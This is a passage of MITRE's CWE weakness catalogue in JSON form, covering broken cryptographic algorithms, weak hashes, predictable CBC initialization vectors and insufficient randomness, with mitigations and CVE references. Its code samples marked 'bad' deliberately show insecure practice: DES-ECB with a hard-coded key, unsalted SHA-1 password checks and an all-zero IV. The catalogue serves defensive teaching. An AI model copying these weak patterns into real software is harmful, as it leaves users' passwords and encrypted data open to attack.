Encryption Standard (DES).","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":"EVP_des_ecb();"},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Cipher des=Cipher.getInstance(\\"DES...\\");des.initEncrypt(key2);","xhtml:br":""}},{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function encryptPassword($password){}","xhtml:div":{"#text":"$iv_size = mcrypt_get_iv_size(MCRYPT_DES, MCRYPT_MODE_ECB);$iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);$key = \\"This is a password encryption key\\";$encryptedPassword = mcrypt_encrypt(MCRYPT_DES, $key, $password, MCRYPT_MODE_ECB, $iv);return $encryptedPassword;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}}}],"Body_Text":"Once considered a strong algorithm, DES now regarded as insufficient for many applications. It has been replaced by Advanced Encryption Standard (AES)."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-3775","Description":"Product uses \\"ROT-25\\" to obfuscate the password in the registry.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3775"},{"Reference":"CVE-2007-4150","Description":"product only uses \\"XOR\\" to obfuscate sensitive data","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4150"},{"Reference":"CVE-2007-5460","Description":"product only uses \\"XOR\\" and a fixed key to obfuscate sensitive data","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5460"},{"Reference":"CVE-2005-4860","Description":"Product substitutes characters with other characters in a fixed way, and also leaves certain input characters unchanged.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4860"},{"Reference":"CVE-2002-2058","Description":"Attackers can infer private IP addresses by dividing each octet by the MD5 hash of \'20\'.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2058"},{"Reference":"CVE-2008-3188","Description":"Product uses DES when MD5 has been specified in the configuration, resulting in weaker-than-expected password hashes.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3188"},{"Reference":"CVE-2005-2946","Description":"Default configuration of product uses MD5 instead of stronger algorithms that are available, simplifying forgery of certificates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2946"},{"Reference":"CVE-2007-6013","Description":"Product uses the hash of a hash for authentication, allowing attackers to gain privileges if they can obtain the original hash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6013"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Using a broken or risky cryptographic algorithm"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A8","Entry_Name":"Insecure Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC30-C","Entry_Name":"Do not use the rand() function for generating pseudorandom numbers","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MSC32-C","Entry_Name":"Properly seed pseudorandom number generators","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"MSC02-J","Entry_Name":"Generate strong random numbers"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-327"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"20"}},{"attr":{"@_CAPEC_ID":"459"}},{"attr":{"@_CAPEC_ID":"473"}},{"attr":{"@_CAPEC_ID":"475"}},{"attr":{"@_CAPEC_ID":"608"}},{"attr":{"@_CAPEC_ID":"614"}},{"attr":{"@_CAPEC_ID":"97"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-280"}},{"attr":{"@_External_Reference_ID":"REF-281"}},{"attr":{"@_External_Reference_ID":"REF-282"}},{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-284"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 8, &#34;Cryptographic Foibles&#34; Page 259"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 21: Using the Wrong Cryptography.&#34; Page 315"}},{"attr":{"@_External_Reference_ID":"REF-287"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Insufficient or Obsolete Encryption&#34;, Page 44"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-327"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":{"#text":"Since CWE 4.4, various cryptography-related entries, including CWE-327 and CWE-1240, have been slated for extensive research, analysis, and community consultation to define consistent terminology, improve relationships, and reduce overlap or duplication. As of CWE 4.6, this work is still ongoing.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Background_Details, Common_Consequences, Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Demonstrative_Examples, Description, Observed_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Applicable_Platforms, Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Detection_Factors, Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Using a Broken or Risky Cryptographic Algorithm","attr":{"@_Date":"2008-04-11"}}}},"328":{"attr":{"@_ID":"328","@_Name":"Use of Weak Hash","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses an algorithm that produces a digest (output value) that does not meet security expectations for a hash function that allows an adversary to reasonably determine the original input (preimage attack), find another input that can produce the same hash (2nd preimage attack), or find multiple inputs that evaluate to the same hash (birthday attack).","Extended_Description":{"xhtml:p":["A hash function is defined as an algorithm that maps arbitrarily sized data into a fixed-sized digest (output) such that the following properties hold:","Building on this definition, a cryptographic hash function must also ensure that a malicious actor cannot leverage the hash function to have a reasonable chance of success at determining any of the following:","What is regarded as \\"reasonable\\" varies by context and threat model, but in general, \\"reasonable\\" could cover any attack that is more efficient than brute force (i.e., on average, attempting half of all possible combinations). Note that some attacks might be more efficient than brute force but are still not regarded as achievable in the real world.","Any algorithm does not meet the above conditions will generally be considered weak for general use in hashing.","In addition to algorithmic weaknesses, a hash function can be made weak by using the hash in a security context that breaks its security guarantees. For example, using a hash function without a salt for storing passwords (that are sufficiently short) could enable an adversary to create a \\"rainbow table\\" [REF-637] to recover the password under certain conditions; this attack works against such hash functions as MD5, SHA-1, and SHA-2."],"xhtml:ul":[{"xhtml:li":["1. The algorithm is not invertible (also called \\"one-way\\" or \\"not reversible\\")","2. The algorithm is deterministic; the same input produces the same digest every time"]},{"xhtml:li":["1. the original input (preimage attack), given only the digest","2. another input that can produce the same digest (2nd preimage attack), given the original input","3. a set of two or more inputs that evaluate to the same digest (birthday attack), given the actor can arbitrarily choose the inputs to be hashed and can do so a reasonable amount of times"]}]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"326","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"327","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-51"},"Phase":"Architecture and Design","Description":{"xhtml:p":["Use an adaptive hash function that can be configured to change the amount of computational effort needed to compute the hash, such as the number of iterations (\\"stretching\\") or the amount of memory required. Some hash functions perform salting automatically. These functions can significantly increase the overhead for a brute force attack compared to intentionally-fast functions such as MD5. For example, rainbow table attacks can become infeasible due to the high computing overhead. Finally, since computing power gets faster and cheaper over time, the technique can be reconfigured to increase the workload without forcing an entire replacement of the algorithm in use.","Some hash functions that have one or more of these desired properties include bcrypt [REF-291], scrypt [REF-292], and PBKDF2 [REF-293]. While there is active debate about which of these is the most effective, they are all stronger than using salts with hash functions with very little computing overhead.","Note that using these functions can have an impact on performance, so they require special consideration to avoid denial-of-service attacks. However, their configurability provides finer control over how much CPU and memory is used, so it could be adjusted to suit the environment\'s needs."]},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-101"},"Intro_Text":"In both of these examples, a user is logged in if their given password matches a stored password:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned char *check_passwd(char *plaintext) {}","xhtml:div":{"#text":"ctext = simple_digest(\\"sha1\\",plaintext,strlen(plaintext), ... );if (equal(ctext, secret_password())) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":"//Login if hash matches stored hash","xhtml:div":{"#text":"login_user();","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String plainText = new String(plainTextIn);MessageDigest encer = MessageDigest.getInstance(\\"SHA\\");encer.update(plainTextIn);byte[] digest = password.digest();if (equal(digest,secret_password())) {}","xhtml:br":["","","","",""],"xhtml:i":"//Login if hash matches stored hash","xhtml:div":{"#text":"login_user();","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"This code relies exclusively on a password mechanism (CWE-309) using only one factor of authentication (CWE-308). If an attacker can steal or guess a user\'s password, they are given full access to their account. Note this code also uses SHA-1, which is a weak hash (CWE-328).  It also does not use a salt (CWE-759)."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-4900","Description":"SHA-1 algorithm is not collision-resistant.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4900"},{"Reference":"CVE-2020-25685","Description":"DNS product uses a weak hash (CRC32 or SHA-1) of the query name, allowing attacker to forge responses by computing domain names with the same hash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25685"},{"Reference":"CVE-2012-6707","Description":"blogging product uses MD5-based algorithm for passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6707"},{"Reference":"CVE-2019-14855","Description":"forging of certificate signatures using SHA-1 collisions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14855"},{"Reference":"CVE-2017-15999","Description":"mobile app for backup sends SHA-1 hash of password in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15999"},{"Reference":"CVE-2006-4068","Description":"Hard-coded hashed values for username and password contained in client-side script, allowing brute-force offline attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4068"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Reversible One-Way Hash"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"461"}},{"attr":{"@_CAPEC_ID":"68"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-289"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Common Vulnerabilities of Integrity&#34;, Page 47"}},{"attr":{"@_External_Reference_ID":"REF-291"}},{"attr":{"@_External_Reference_ID":"REF-292"}},{"attr":{"@_External_Reference_ID":"REF-293","@_Section":"5.2 PBKDF2"}},{"attr":{"@_External_Reference_ID":"REF-294"}},{"attr":{"@_External_Reference_ID":"REF-295"}},{"attr":{"@_External_Reference_ID":"REF-296"}},{"attr":{"@_External_Reference_ID":"REF-297"}},{"attr":{"@_External_Reference_ID":"REF-298"}},{"attr":{"@_External_Reference_ID":"REF-637"}},{"attr":{"@_External_Reference_ID":"REF-1243"}},{"attr":{"@_External_Reference_ID":"REF-1244"}}]},"Notes":{"Note":{"#text":"Since CWE 4.4, various cryptography-related entries including CWE-328 have been slated for extensive research, analysis, and community consultation to define consistent terminology, improve relationships, and reduce overlap or duplication. As of CWE 4.6, this work is still ongoing.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"329":{"attr":{"@_ID":"329","@_Name":"Generation of Predictable IV with CBC Mode","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product generates and uses a predictable initialization Vector (IV) with Cipher Block Chaining (CBC) Mode, which causes algorithms to be susceptible to dictionary attacks when they are encrypted under the same key.","Extended_Description":{"xhtml:p":"CBC mode eliminates a weakness of Electronic Code\\n\\t   Book (ECB) mode by allowing identical plaintext blocks to\\n\\t   be encrypted to different ciphertext blocks. This is\\n\\t   possible by the XOR-ing of an IV with the initial plaintext\\n\\t   block so that every plaintext block in the chain is XOR\'d\\n\\t   with a different value before encryption. If IVs are\\n\\t   reused, then identical plaintexts would be encrypted to\\n\\t   identical ciphertexts. However, even if IVs are not\\n\\t   identical but are predictable, then they still break the\\n\\t   security of CBC mode against Chosen Plaintext Attacks\\n\\t   (CPA)."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1204","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":{"xhtml:p":["CBC mode is a commonly used mode of operation for a\\n\\t      block cipher. It works by XOR-ing an IV with the initial\\n\\t      block of a plaintext prior to encryption and then\\n\\t      XOR-ing each successive block of plaintext with the\\n\\t      previous block of ciphertext before encryption.","When used properly, CBC mode provides security against\\n\\t\\tchosen plaintext attacks. Having an unpredictable IV\\n\\t\\tis a crucial underpinning of this. See [REF-1171]."],"xhtml:div":{"#text":"C_0 = IVC_i = E_k{M_i XOR C_{i-1}}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Designers might assume a non-cryptographic context for a cryptographic variable."},{"Phase":"Implementation","Note":"Developers might dismiss the importance of an unpredictable IV and choose an easier implementation to save effort, weakening the scheme in the process."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"If the IV is not properly initialized, data that is encrypted can be compromised and leak information."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"NIST recommends two methods of generating unpredictable IVs for CBC mode [REF-1172]. The first is to generate the IV randomly. The second method is to encrypt a nonce with the same key and cipher to be used to encrypt the plaintext. In this case the nonce must be unique but can be predictable, since the block cipher will act as a pseudo random permutation."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-143"},"Intro_Text":"In the following examples, CBC mode is used when encrypting data:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"EVP_CIPHER_CTX ctx;char key[EVP_MAX_KEY_LENGTH];char iv[EVP_MAX_IV_LENGTH];RAND_bytes(key, b);memset(iv,0,EVP_MAX_IV_LENGTH);EVP_EncryptInit(&amp;ctx,EVP_bf_cbc(), key,iv);","xhtml:br":["","","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class SymmetricCipherTest {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public static void main() {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"byte[] text =\\"Secret\\".getBytes();byte[] iv ={};KeyGenerator kg = KeyGenerator.getInstance(\\"DES\\");kg.init(56);SecretKey key = kg.generateKey();Cipher cipher = Cipher.getInstance(\\"DES/CBC/PKCS5Padding\\");IvParameterSpec ips = new IvParameterSpec(iv);cipher.init(Cipher.ENCRYPT_MODE, key, ips);return cipher.doFinal(inpBytes);","xhtml:br":["","","","","","","","",""],"xhtml:div":{"#text":"0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00","attr":{"@_style":"margin-left:10px;"}}}}}}}}],"Body_Text":"In both of these examples, the initialization vector (IV) is always a block of zeros. This makes the resulting cipher text much more predictable and susceptible to a dictionary attack."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-5408","Description":"encryption functionality in an authentication framework uses a fixed null IV with CBC mode, allowing attackers to decrypt traffic in applications that use this functionality","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5408"},{"Reference":"CVE-2017-17704","Description":"messages for a door-unlocking product use a fixed IV in CBC mode, which is the same after each restart","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17704"},{"Reference":"CVE-2017-11133","Description":"application uses AES in CBC mode, but the pseudo-random secret and IV are generated using math.random, which is not cryptographically strong.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11133"},{"Reference":"CVE-2007-3528","Description":"Blowfish-CBC implementation constructs an IV where each byte is calculated modulo 8 instead of modulo 256, resulting in less than 12 bits for the effective IV length, and less than 4096 possible IV values.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3528"},{"Reference":"CVE-2011-3389","Description":"BEAST attack in SSL 3.0 / TLS 1.0. In CBC mode, chained initialization vectors are non-random, allowing decryption of HTTPS traffic using a chosen plaintext attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389"}]},"Functional_Areas":{"Functional_Area":"Cryptography"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Not using a random IV with CBC mode"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Initialization Vectors&#34;, Page 42"}},{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-1171"}},{"attr":{"@_External_Reference_ID":"REF-1172","@_Section":"Appendix C"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Background_Details, Common_Consequences, Functional_Areas, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Modes_of_Introduction, Name, Observed_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Description, Maintenance_Notes, Name, References"}],"Previous_Entry_Name":[{"#text":"Not Using a Random IV with CBC Mode","attr":{"@_Date":"2021-03-15"}},{"#text":"Not Using an Unpredictable IV with CBC Mode","attr":{"@_Date":"2021-07-20"}}]}},"330":{"attr":{"@_ID":"330","@_Name":"Use of Insufficiently Random Values","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Stable"},"Description":"The software uses insufficiently random numbers or values in a security context that depends on unpredictable numbers.","Extended_Description":"When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Computers are deterministic machines, and as such are unable to produce true randomness. Pseudo-Random Number Generators (PRNGs) approximate randomness algorithmically, starting with a seed from which subsequent values are calculated. There are two types of PRNGs: statistical and cryptographic. Statistical PRNGs provide useful statistical properties, but their output is highly predictable and forms an easy to reproduce numeric stream that is unsuitable for use in cases where security depends on generated values being unpredictable. Cryptographic PRNGs address this problem by generating output that is more difficult to predict. For a value to be cryptographically secure, it must be impossible or highly improbable for an attacker to distinguish between it and a truly random value."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Confidentiality","Other"],"Impact":"Other","Note":"When a protection mechanism relies on random values to restrict access to a sensitive resource, such as a session ID or a seed for generating a cryptographic key, then the resource being protected could be accessed by guessing the ID or key."},{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"If software relies on unique, unguessable IDs to identify a resource, an attacker might be able to guess an ID for a resource that is owned by another user. The attacker could then read the resource, or pre-create a resource with the same ID to prevent the legitimate program from properly sending the resource to the intended user. For example, a product might maintain session information in a file whose name is based on a username. An attacker could pre-create this file for a victim user, then set the permissions so that the application cannot generate the session for the victim, preventing the victim from using the application."},{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"When an authorization or authentication mechanism relies on random values to restrict access to restricted functionality, such as a session ID or a seed for generating a cryptographic key, then an attacker may access the restricted functionality by guessing the ID or key."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-11.4"},"Method":"Black Box","Description":{"xhtml:p":["Use monitoring tools that examine the software\'s process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, 